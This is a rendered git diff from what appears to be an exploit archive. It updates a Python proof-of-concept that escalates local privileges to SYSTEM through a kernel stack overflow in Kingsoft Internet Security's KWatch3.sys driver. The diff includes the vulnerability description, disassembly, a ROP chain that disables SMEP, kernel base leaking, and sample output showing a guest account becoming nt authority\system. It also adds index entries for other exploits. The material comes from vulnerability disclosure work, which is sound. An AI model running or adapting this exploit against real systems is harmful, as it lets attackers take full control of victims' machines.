This vulnerability allows local attackers to escalate privileges on vulnerable installations of Kingsoft Internet Security.
|
||||
|
||||
The specific flaws exists within the processing of IOCTL 0x80030004 or 0x80030008 by either the kavfm.sys (anti-virus) or the KWatch3.sys (internet security) kernel driver.
|
||||
|
||||
The driver doesn’t properly validate user-supplied data which can result in a kernel stack buffer overflow.
|
||||
|
||||
An attacker can leverage this vulnerability to execute arbitrary code under the context of kernel.
|
||||
I am only going to detail a single bug since both ioctl handlers are *almost* identical. Inside the KWatch3.sys driver, we can see the following handler code for the first ioctl code (0x80030004)
|
||||
|
||||
; jumptable 000117C1 case 0
|
||||
|
||||
.text:000117C8 loc_117C8: ; CODE XREF: sub_11790+31
|
||||
.text:000117C8
|
||||
.text:000117C8 push ebx ; our input buffer size
|
||||
|
@ -39,8 +34,55 @@ An attacker can leverage this vulnerability to execute arbitrary code under the
|
|||
.text:000117EB pop ebx
|
||||
.text:000117EC add esp, 44h
|
||||
.text:000117EF retn 8
|
||||
'''
|
||||
|
||||
Additional bugs:
|
||||
~~~~~~~~~~~~~~~~
|
||||
|
||||
Out-of-Bounds Read vulnerabilities exist in the following ioctls as well:
|
||||
|
||||
- 0x8003001c
|
||||
- 0x80030020
|
||||
- 0x80030024
|
||||
- 0x80030028
|
||||
|
||||
There is more, but I gave up. This happens because there are several functions that contain code like this:
|
||||
|
||||
.text:000172A0 loc_172A0: ; CODE XREF: sub_17280+29
|
||||
.text:000172A0 mov cx, [eax] ; @eax is our input buffer
|
||||
.text:000172A3 add eax, 2
|
||||
.text:000172A6 test cx, cx
|
||||
.text:000172A9 jnz short loc_172A0 ; jump if there is no null word
|
||||
|
||||
So all we have to do is set our input buffer to contain no null word values. Note that these only trigger a bug check if special pool is enabled and dont look exploitable (no leaking in the output buffer)
|
||||
|
||||
Example:
|
||||
========
|
||||
|
||||
c:\Users\Guest\Desktop>whoami
|
||||
victim\guest
|
||||
|
||||
c:\Users\Guest\Desktop>poc.py
|
||||
|
||||
--[ Kingsoft Internet Security Kernel Stack Overflow EoP Exploit ]
|
||||
Steven Seeley (mr_me) of Source Incite
|
||||
|
||||
(+) enumerating kernel base address...
|
||||
(+) found nt base at 0x8147e000
|
||||
(+) allocating shellcode @ 0x24242424
|
||||
(+) sending stack overflow...
|
||||
Microsoft Windows [Version 10.0.15063]
|
||||
(c) 2017 Microsoft Corporation. All rights reserved.
|
||||
|
||||
c:\Users\Guest\Desktop>whoami
|
||||
nt authority\system
|
||||
|
||||
c:\Users\Guest\Desktop>
|
||||
|
||||
References:
|
||||
===========
|
||||
|
||||
- https://sizzop.github.io/2016/09/13/kernel-hacking-with-hevd-part-5.html
|
||||
"""
|
||||
import sys
|
||||
from ctypes import *
|
||||
from time import sleep
|
||||
|
@ -126,11 +168,11 @@ def alloc(base, input_size, ip):
|
|||
size = c_int(input_size)
|
||||
input = "\x44" * 0x40 # offset to ip
|
||||
|
||||
# start our rop chain
|
||||
# start rop chain
|
||||
input += struct.pack("<I", nt + 0x51976f) # pop ecx; ret
|
||||
input += struct.pack("<I", 0x75757575) # junk
|
||||
input += struct.pack("<I", 0x76767676) # junk
|
||||
input += struct.pack("<I", ip) # load 0x506f8
|
||||
input += struct.pack("<I", ip) # load a ptr to 0x506f8
|
||||
input += struct.pack("<I", nt + 0x04664f) # mov eax, [ecx]; ret
|
||||
input += struct.pack("<I", nt + 0x22f2da) # mov cr4,eax; ret
|
||||
input += struct.pack("<I", ip + 0x4) # &shellcode
|
||||
|
@ -199,9 +241,9 @@ def we_can_leak_the_base():
|
|||
global nt
|
||||
print "(+) enumerating kernel base address..."
|
||||
|
||||
array = c_ulonglong * 1024
|
||||
lpImageBase = array()
|
||||
szDriver = array()
|
||||
c_ulong_array = c_ulong * 1024
|
||||
lpImageBase = c_ulong_array()
|
||||
szDriver = c_ulong_array()
|
||||
cb = sizeof(lpImageBase)
|
||||
lpcbNeeded = c_long()
|
||||
|
||||
|
@ -213,17 +255,37 @@ def we_can_leak_the_base():
|
|||
sys.exit(-1)
|
||||
|
||||
# nt is the first one
|
||||
nt = lpImageBase[0] & 0x00000000ffffffff
|
||||
return True
|
||||
nt = lpImageBase[0]
|
||||
|
||||
# find KWatch3, for if it doesnt exist, we can't exploit it now...
|
||||
for driver in lpImageBase:
|
||||
lpBaseName = create_string_buffer("", MAX_PATH)
|
||||
GetDeviceDriverBaseName = windll.psapi.GetDeviceDriverBaseNameA
|
||||
GetDeviceDriverBaseName.argtypes = [LPVOID, LPSTR, DWORD]
|
||||
if(GetDeviceDriverBaseName(driver, lpBaseName, MAX_PATH)):
|
||||
if lpBaseName.value == "KWatch3.sys":
|
||||
return True
|
||||
return False
|
||||
|
||||
def main():
|
||||
print "\n\t--[ Kingsoft Internet Security Kernel Stack Overflow EoP Exploit ]"
|
||||
print "\t Steven Seeley (mr_me) of Source Incite\r\n"
|
||||
|
||||
if release() != "10" or architecture()[0] != "32bit":
|
||||
print "(-) although this exploit may work on this system,"
|
||||
print " it was only designed for Windows 10 x86."
|
||||
sys.exit(-1)
|
||||
|
||||
if we_can_leak_the_base():
|
||||
print "(+) found nt base at 0x%08x" % (nt)
|
||||
if we_can_trigger_overflow():
|
||||
os.system("cmd.exe")
|
||||
else:
|
||||
print "(-) it appears that kingsoft Internet Security is not vulnerable!"
|
||||
sys.exit(-1)
|
||||
else:
|
||||
print "(-) it appears that kingsoft Internet Security is not installed!"
|
||||
sys.exit(-1)
|
||||
|
||||
if __name__ == '__main__':
|
||||
main()
|
|
@ -9243,6 +9243,7 @@ id,file,description,date,author,type,platform,port
|
|||
43397,exploits/bsd/local/43397.md,"Sony Playstation 4 4.05 FW - Local Kernel Loader",2017-12-27,Specter,local,bsd,
|
||||
43418,exploits/linux/local/43418.c,"Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP)",2017-08-13,"Andrey Konovalov",local,linux,
|
||||
43421,exploits/windows/local/43421.py,"Kingsoft Antivirus/Internet Security 9+ - Privilege Escalation",2018-01-03,mr_me,local,windows,
|
||||
43427,exploits/multiple/local/43427.c,"Multiple CPUs - 'Spectre' Information Disclosure (PoC)",2018-01-03,multiple,local,multiple,
|
||||
41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android,
|
||||
41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple,
|
||||
41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,
|
||||
|
@ -15882,6 +15883,9 @@ id,file,description,date,author,type,platform,port
|
|||
43411,exploits/windows/remote/43411.rb,"HP Mercury LoadRunner Agent magentproc.exe - Remote Command Execution (Metasploit)",2018-01-01,Metasploit,remote,windows,54345
|
||||
43412,exploits/unix/remote/43412.rb,"Cambium ePMP1000 - 'ping' Shell via Command Injection (Metasploit)",2018-01-01,Metasploit,remote,unix,
|
||||
43413,exploits/cgi/remote/43413.rb,"Cambium ePMP1000 - 'get_chart' Shell via Command Injection (Metasploit)",2018-01-01,Metasploit,remote,cgi,
|
||||
43428,exploits/hardware/remote/43428.py,"Iopsys Router - 'dhcp' Remote Code Execution",2017-12-23,neonsea,remote,hardware,
|
||||
43429,exploits/hardware/remote/43429.rb,"Linksys WVBR0-25 - User-Agent Command Execution (Metasploit)",2018-01-04,Metasploit,remote,hardware,
|
||||
43430,exploits/linux/remote/43430.rb,"Xplico - Remote Code Execution (Metasploit)",2018-01-04,Metasploit,remote,linux,9876
|
||||
41638,exploits/windows/remote/41638.txt,"HttpServer 1.0 - Directory Traversal",2017-03-19,malwrforensics,remote,windows,
|
||||
41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows,
|
||||
41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue